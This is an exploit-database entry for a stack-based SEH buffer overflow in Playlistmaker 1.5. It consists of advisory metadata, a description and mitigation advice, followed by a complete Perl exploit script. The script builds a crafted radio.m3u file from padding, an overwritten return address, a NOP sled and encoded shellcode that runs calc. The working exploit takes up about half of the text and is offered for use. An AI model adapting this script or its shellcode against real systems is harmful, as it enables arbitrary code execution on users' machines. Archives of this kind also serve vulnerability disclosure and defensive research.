Playlistmaker1.5 (m3l,m3u files) local buffer overflow exploit (SEH)

vendor:

Playlistmaker

by:

germaya_x

9,3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Playlistmaker

Affected Version From: 1.5

Affected Version To: 1.5

Patch Exists: YES

Related CWE: N/A

CPE: a:proletsoft:playlistmaker:1.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2009

Playlistmaker1.5 (m3l,m3u files) local buffer overflow exploit (SEH)

A buffer overflow vulnerability exists in Playlistmaker1.5 (m3l,m3u files) due to improper bounds checking of user-supplied data. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. This vulnerability is due to a failure of the application to properly bounds check user-supplied data before copying it into an insufficiently sized memory buffer. This can be exploited to cause a stack-based buffer overflow via a specially crafted m3l or m3u file.

Mitigation:

Upgrade to the latest version of Playlistmaker1.5 (m3l,m3u files) or apply the appropriate patch.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#discoverd by:  germaya_x
#soft:Playlistmaker1.5 (m3l,m3u files) local buffer overflow exploit (SEH)
#Download: http://proletsoft.freeservers.com/mmb/playlistmaker.html
#tested on: xp sp3 (EN)
#bug date:August 06 09
#greetz:hack4love ,devil fucker ,angel
###############################################################################################
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
my $shellcode =
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".
"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".
"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".
"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".
"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".
"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".
"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".
"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".
"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".
"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";
my $bof="A" x 992;
my $eip_next="\x33\xBF\x96\x7C"; #
my $nop="\x90" x 20;

################################################################################################
open(MYFILE,'>>radio.m3u');
print MYFILE $bof.$eip_next.$nop.$shellcode;
close(MYFILE);
################################################################################################

# milw0rm.com [2009-08-06]